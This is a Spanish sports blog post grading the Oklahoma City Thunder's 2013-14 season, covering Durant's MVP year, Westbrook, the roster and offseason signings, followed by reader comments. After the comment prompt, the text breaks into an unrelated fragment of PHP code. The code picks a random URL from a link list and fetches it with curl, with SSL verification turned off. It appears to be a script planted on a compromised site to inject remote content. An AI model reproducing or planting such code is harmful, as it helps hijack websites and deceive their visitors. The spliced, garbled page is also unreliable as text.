Oklahoma City Thunder: Notable

14 de August de 2014 por TheDeerHunter

Los Thunder han protagonizado una buena campaña aunque con un poso negativo debido al poco botín que les supone caer en la final de conferencia. Apuntaban al “ahora o nunca” pero terminaron claudicando ante unos Spurs casi intratables. Precisamente el equipo de Popovich representa las antípodas del modelo que ha seguido la franquicia del trueno durante el último lustro. El vigente proyecto, con todo a favor para alcanzar algún título, corre serio peligro de quedar a la deriva. Hasta ahora no ha alcanzado y no parece que pueda estirarse mucho más. Será difícil disfrutar de un temporadón superior de sus dos estrellas y la aportación del resto no marcará la diferencia entre el éxito y el fracaso, especialmente si se mantiene la filosofía actual de reparto de protagonismo. Además, semejante concentración de talento en sus dos o tres mejores hombres les deja críticamente expuestos a problemas físicos de alguno de ellos y lamentablemente son reincidentes en este sentido. Por si fuera poco, al contrario de lo que podríamos imaginar, Oklahoma parece no ser destino atractivo para agentes libres válidos. Resulta extraño a la par que preocupante para un contendiente como ellos quedarse tan “compuestos y sin novia” en el mercado de jugadores. 

Hemos asistido a la mejor campaña de Kevin Durant. Merecidísimo MVP reforzado por la baja durante los primeros meses de la otra estrella del equipo, que le permitió destacar en exclusividad. Estamos ante un anotador de calibre histórico, cuya producción ofensiva durante la regular resiste la comparación frente los mejores cañoneros de todos los tiempos. Era prácticamente imposible mantener el nivel de acierto en playoffs. La otra pata del “dúo dinámico”, Russell Westbrook, se ha comportado de forma contraria. Desempeño más bien discreto respecto a sus estándares tras volver de la lesión pero postemporada para enmarcar evocando a Oscar Robertson. Candidato a MVP absoluto de playoffs. Ni siquiera un nivel semejante de estos dos monstruos les ha llevado a las finales. El problema es conocido. Ellos dos son sobradamente capaces de resolver casi cualquier situación. Los sistemas se basan casi exclusivamente en ataques lo más directos posibles ejecutados por uno u otro. La interacción entre ellos es secundaria y el flujo de juego con el resto del equipo irrelevante.  La proporción de lanzamientos que se juega el dúo suele estar por encima del 50% del total. El ataque de Oklahoma, por tanto, tiene tendencia a la previsibilidad y, en el camino hacia el título, los mejores equipos defensivos de la liga son capaces de sacarle partido.

Cualquier juicio que se realice sobre el resto de la plantilla deberá tener necesariamente en cuenta  el específico reparto de roles que marca el guión. Se esperaba mucho de Serge Ibaka y Reggie Jackson. Ambos han cumplido bien, aunque quizá algo por debajo de las previsiones. El primero ha progresado nuevamente este año aunque no tanto respecto al salto cualitativo que dio el pasado. Sus playoffs quedaron marcados por una lesión que le limitó comprensiblemente. El problema de Jackson es que su rendimiento suele ser inversamente proporcional a la presencia de Westbrook, relativamente redundantes. Pesos pesados como Thabo Sefolosha, Nick Collison, Kedrick Perkins y Derek Fisher han dado un visible paso atrás en sus prestaciones que no ha venido acompañado de una mayor presencia de los jóvenes que pedían paso como Perry Jones o Jeremy Lamb. Gente como Thabeet, Gomes y Royal Ivey ni han estado ni se les esperaba. Sólo el impacto del rookie Steve Adams y el fichaje de Caron Butler casi a final de curso han supuesto incorporaciones positivas para la intendencia.

Llevamos tiempo señalando el progresivo deterioro del nivel de la plantilla de los Thunder, coincidente con la cada día más brutal evolución de Durant y Westbrook por un lado, más la de Ibaka y Jackson por el otro. El objetivo no es otro que el campeonato y sólo el futuro aclarará si aún están en condiciones de lograrlo. El tiempo corre en su contra.

PREMIOS

MVP: Kevin Durant ha logrado por primera vez arrebatarle la corona de mejor jugador del mundo a LeBron James y no lo ha hecho de cualquier manera sino con una campaña “Jordaniana”. Lo más asombroso no es que haya logrado anotar 32 puntos, capturar casi 7.5 rebotes, repartir 5.5 asistencias, por 1 tapón y robar un balón y pico por partido, no. Lo fascinante es que lo ha hecho con un acierto de más del 50% en TC y casi de un 40% en T3. La postemporada de Russell Westbrook, con casi 27 puntos, 7,3 rebotes, 8 asistencias y más de dos robos por partido también es para darle de comer a parte.

Rookie: En su primer año Steven Adams le ha robado la tostada a Kedrick Perkins y, por supuesto, a Hasheem Thabeet. Su perfil de hombre grande y rocoso es ideal para el rol que debe defender en Oklahoma City. Cuidado con la cantidad de enemigos que se ha creado en tan poco tiempo.

Sorpresa: Caron Butler fue rescatado en marzo de su plácido “retiro” competitivo en Milwaukee. Soy de los que esperaban tanto de su aportación como de la de Ryan Gomes. En cambio no sólo firmó algunos buenos partidos en el último mes de regular ¨(incluidas dos anotaciones de 23 puntos), sino que además fue fundamental para pasar dos muy malos tragos ante Memphis y Clippers en playoffs.

Decepción: A Jeremy Lamb y Perry Jones les tocaba entrar ya mismo en la rotación. El primero aún rascó algo de bola en la regular pero ninguno de los dos la olió en playoffs. Hay que señalar que de todo esto también debe de tener mucha parte de responsabilidad Scott Brooks.

Esfuerzo en vano: Serge Ibaka se jugó nada menos que el Mundial volviendo de su lesión en unos plazos de recuperación absurdos para intentar salvar a los suyos ante Duncan y compañía. El riesgo que asumió equilibró algo el asunto pero no evitó la derrota. Por su parte Thabo Sefolosha ha terminado su etapa en Oklahoma saliendo por la puerta de atrás. Nunca se le pudo reprochar su entrega aunque este año ha estado particularmente errático en los escasos lanzamientos que le han caído en gracia.

JUGANDO A GM

Poco se ha hecho pero parece que mucho queda todavía por hacer.

Lo más sonado fueron los rumores que surgieron entorno a Pau Gasol, que no fructificaron. Nos quedaremos con las ganas de saber si la excelente capacidad de pase del catalán hubiera sido la piedra angular que terminara de apuntalar el demoledor ataque de los Thunder, o si él se habría terminado de desesperar corriendo de un lado al otro de la cancha sin recibir apenas juego de sus compañeros.

En el plano teórico no dejamos de pensar que quizá la solución pasa por traspasar a Westbrook o Jackson para rodear a Durant de un entramado de mayores garantías. Parece que no está en los planes de la franquicia… de momento.

Al final sólo se ha fichado a Sebastian Telfair y Anthony Morrow, que se incorporan junto a Mitch McGary, la elección 21 del pasado draft. En cambio Josh Huestis hará historia al convertirse en el primer jugador americano formado en USA y escogido en 1ª ronda que en lugar de firmar por su equipo NBA se va a la D-League. Tremendamente insuficiente. La plantilla que queda para el curso que viene parece inferior a la que fue eliminada por San Antonio:

PG: Russell Westbrook, Sebastian Telfair
SG: Reggie Jackson, Anthony Morrow, Jeremy Lamb
SF: Kevin Durant, Andre Roberson
PF: Serge Ibaka, Nick Collison, Perry Jones, Grant Jerrett
C: Steven Adams, Kendrick Perkins, Mitch McGary, Hasheem Thabeet

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    ya de entrada no coincido con el notable, el Thunder viene llegando a final de conferencia en las ultimas 4 temporadas, yo veo cierto estancamiento y muy poca capacidad de maniobra para mejorar demasiado a futuro

      Citar

  2. TheDeerHunter dice:
    #2

    Sólo han sido el tercer mejor equipo del año…
    Lo del estancamiento y la poca capacidad de maniobra lo vemos todos, pero su campaña ha sido muy buena. Lo único malo es que la de los Spurs ha sido aún mejor.

      Citar

  3. Jose Luis dice:
    #3

    Esto es un notable claro, no llegan al sobresaliente porque siguen igual, pero el notable es claro.

      Citar

  4. MagicJohnson32 dice:
    #4

    Me gustaría que el actual bloque de los Thunder tuviese una oportunidad con otro entrenador. No garantizaría nada, por supuesto, pero creo que la plantilla tiene más recorrido que el que Brooks es capaz de darle, y ya van muchos años y muchas ocasiones perdidas.

    Gran análisis, Deer. A mí particularmente me gusta la llegada de Morrow unida a la salida de Sefolosha. Si Adams mostrase algo de evolución y la plantilla llegase sana por una vez a las eliminatorias más complicadas, los Thunder están en primerísima fila entre los favoritos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>